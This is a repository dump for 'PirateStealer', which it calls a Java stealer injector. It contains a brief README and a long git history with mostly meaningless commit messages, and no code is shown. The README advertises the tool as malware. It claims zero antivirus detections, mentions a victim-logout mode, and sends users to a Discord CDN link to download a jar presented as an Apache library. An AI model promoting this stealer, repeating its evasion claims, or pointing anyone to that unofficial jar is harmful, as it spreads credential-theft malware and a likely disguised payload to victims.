======================: FILES :======================
======================: README CONTENT :======================
# PirateStealer
The first and single ****java**** pirate stealer injector on github

- [0/59](https://cdn.discordapp.com/attachments/966959832664014861/967007385522675732/unknown.png) Detections
- injector [src/Injector](https://github.com/itzgonza/Pirate-Stealer/tree/main/src/Injector)
- to use this project, you must install the "[apache.commons.io](https://cdn.discordapp.com/attachments/1040010590028038147/1042482813582184518/apache.jar)" library
- if you enable the "LegitMode" boolean, the program will instant logout when it opens
====================== GIT HISTORY: ======================
576475d HEAD@{0}: clone: from https://github.com/itzgonza/Pirate-Stealer
commit 576475d77c522934d26b58b3f3caacff209329b6
Author: Gonza <61884903+itzgonza@users.noreply.github.com>
Date:   Wed Nov 16 20:04:57 2022 +0300

    maybe outdated
    
    maybe outdated

commit fffb8775cf951c6552877a7b406ce3781694ef8e
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Thu Apr 28 12:14:45 2022 +0300

    gonzawashere
    
    gonzawashere

commit 89cc8f5b1a8e90fa34c0b55b2d90923263f58a76
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Fri Apr 22 13:27:35 2022 +0300

    gonzawashere
    
    dggy

commit fdeb692c6f7c2f4aef1058f84097076b467df494
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Fri Apr 22 12:23:43 2022 +0300

    gonzawashere
    
    dggy

commit 75cb6a90c00bdb4b6ad81aa1ef1dad80aaadd15b
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Fri Apr 22 12:22:06 2022 +0300

    gonzawashere
    
    dggy

commit db6ba526fd2f74a44ebec870b74251a4ee027734
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Fri Apr 22 12:20:35 2022 +0300

    gonzawashere
    
    dggy

commit 585feea6159c287e12806edfd1d0cd0dc20d8cfc
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Fri Apr 22 12:20:14 2022 +0300

    Delete src/Injector directory

commit ae16d19c947c2574758e9a0c4ccbb9d54afb2fbb
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Fri Apr 22 12:18:16 2022 +0300

    gonzawashere
    
    Leblebi

commit 051038d47c0b86aeb6b3919fc48280fe3989da9b
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Fri Apr 22 12:17:29 2022 +0300

    Delete src/Injector/io/github/itzgonza directory

commit 4380951cf9b11845b71a08138750c7ebf330e92a
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Fri Apr 22 12:16:28 2022 +0300

    gonzawashere
    
    Leblebi

commit 9ff919b4313f9c2249ab118bccd752cc79d74146
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Mon Mar 28 15:06:23 2022 +0300

    asd
    
    asd

commit e1a8d407e4bcc7ade95f0e1176b3695e4c6c2584
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Mon Mar 28 14:45:02 2022 +0300

    asd
    
    asd

commit 30ca08800c67337ec9b3105a178477443bd629dd
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Mon Mar 28 14:30:58 2022 +0300

    adsf
    
    adsf

commit fcefff3204e8f39ccdab896eb0651b35003fe9ce
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Mon Mar 28 14:28:35 2022 +0300

    asd
    
    asd

commit fa3ec4c1fe861bd4218a6b57395a3bdf31fa483f
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Mon Mar 28 14:28:21 2022 +0300

    Create README.md

commit d62c787a311a92a14c2fad893d5d48de03877767
Author: #1337 <61884903+itzgonza@users.noreply.github.com>
Date:   Mon Mar 28 14:27:32 2022 +0300

    Delete README.md

commit 10b4b1d2801a7a746f1d91d22fc6dfdc7eb338c9
Author: itzgonza <61884903+itzgonza@users.noreply.github.com>
Date:   Fri Mar 25 22:22:33 2022 +0300

    asd
    
    asd

commit f54289a81e1998be86ccbc4c59c1ea6c4ac95b09
Author: itzgonza <61884903+itzgonza@users.noreply.github.com>
Date:   Fri Mar 25 21:51:17 2022 +0300

    asd
    
    asd

commit 3beeb1ba9354c01d7092911b8ab3e866da9ed4ec
Author: itzgonza <61884903+itzgonza@users.noreply.github.com>
Date:   Fri Mar 11 00:34:55 2022 +0300

    Update injection

commit fd6714252afa303d25c558a1480e98d0c319ffaf
Author: itzgonza <61884903+itzgonza@users.noreply.github.com>
Date:   Thu Mar 10 20:04:44 2022 +0300

    Create injection

commit ca8f531e6c64097e47ecf45db1e8ee4b956a97b2
Author: itzgonza <61884903+itzgonza@users.noreply.github.com>
Date:   Thu Mar 10 19:58:46 2022 +0300

    Initial commit
